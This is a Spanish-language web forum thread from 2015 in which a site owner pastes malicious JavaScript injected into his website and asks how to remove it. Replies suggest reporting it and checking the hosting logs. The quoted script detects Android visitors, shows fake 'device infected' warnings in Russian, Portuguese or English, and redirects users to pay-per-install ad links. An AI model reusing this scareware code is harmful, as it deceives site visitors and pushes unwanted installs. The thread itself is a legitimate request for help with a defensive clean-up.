Fallo de seguridad web, incrustacion javascript malicioso

Iniciado por oriolrg, 28 Julio 2015, 17:20 PM

0 Miembros y 2 Visitantes están viendo este tema.

Imprimir
Ir Abajo Páginas1
Acciones del Usuario

oriolrg

28 Julio 2015, 17:20 PM
Buenas, hace unos días me he encontrado con que mi web lanza un mensaje de virus de vez en cuando, al no encontrar ninguno me puse a investigar y descubrí las siguientes lineas de código usando la herramienta de firefox developers.
Estas lineas vienen del siguiente enlace "ht tp s:/ / d 6 vs15m0nt7ly.c l oudfront.net/ test.js"
Llevo días peleandome con esto y no encuentro nada ni googleando, ni la empresa de hosting me da solución, y la verdad no encuentro la fuente de este código para conseguir borrarla.

var ua = navigator.userAgent.toLowerCase();
var isAndroid = ua.indexOf("android") > -1;

var userLang = navigator.language || navigator.userLanguage;
userLang = userLang.toLowerCase();
var isBrazil = userLang.indexOf("pt-br") > -1;
var isRussia = userLang.indexOf("ru") > -1;

if(isAndroid) {
   if (isRussia) {
      if (confirm("Это устройство заражено. Необходимо установить антивирус")) {
         window.top.location.href='http://c.cpl1.ru/8UcC';; // LEO Privacy Guard Ru
      }
   } else if (isBrazil) {
      if (confirm("Este aparelho está infectado. É necessário fazer uma varredura com antivírus.")) {
          window.top.location.href='http://mytrackinglive.net/trkclk/?pid=357&cid=27615';
      }      
   } else {
      if (confirm("This device is infected. You must check it for viruses with antivirus.")) {
          window.top.location.href='http://c.cpl1.ru/8UcB';; // Hola Launcher
      }
   }
}

Muchas gracias si alguien puede ayudarme!.

engel lex

#1
28 Julio 2015, 21:21 PM
Dijiste cual era a medias el problema...

Mejor explica

Que es lo que quieres y por qué no puedes lograrlo
El problema con la sociedad actualmente radica en que todos creen que tienen el derecho de tener una opinión, y que esa opinión sea validada por todos, cuando lo correcto es que todos tengan derecho a una opinión, siempre y cuando esa opinión pueda ser ignorada, cuestionada, e incluso ser sujeta a burla, particularmente cuando no tiene sentido alguno.

EFEX

#2
28 Julio 2015, 22:17 PM
Usa el servicio CDN de Amazon. Podrias denunciarlo, solo redirecciona a publicidades pay per install apps de instal.com parece ser.. pero como dice engel lex, cual es el problema ? no puedes borrarlo ?
GITHUB 

oriolrg

#3
29 Julio 2015, 09:57 AM
Exacto, el problema es que no consigio borrarlo, ya que no lo encuentro entre los archivos que tengo en el hosting. Me puse en contacto con mi empresa de hosting y su respuesta fue que no tenia ninguna infeccion :-[
Así que el problema es que no consigo sacar-lo...
Muchas gràcias!

EFEX

#4
30 Julio 2015, 02:57 AM
Revisa los logs, es un hosting compartido ? o un hosting gratuito(puede que el mismo host lo agrege)?
GITHUB 

oriolrg

#5
30 Julio 2015, 10:39 AM
Es un hosting de pago, con Cpanel. En los logs que tendria que ver?
Imprimir
Ir Arriba Páginas1
Acciones del Usuario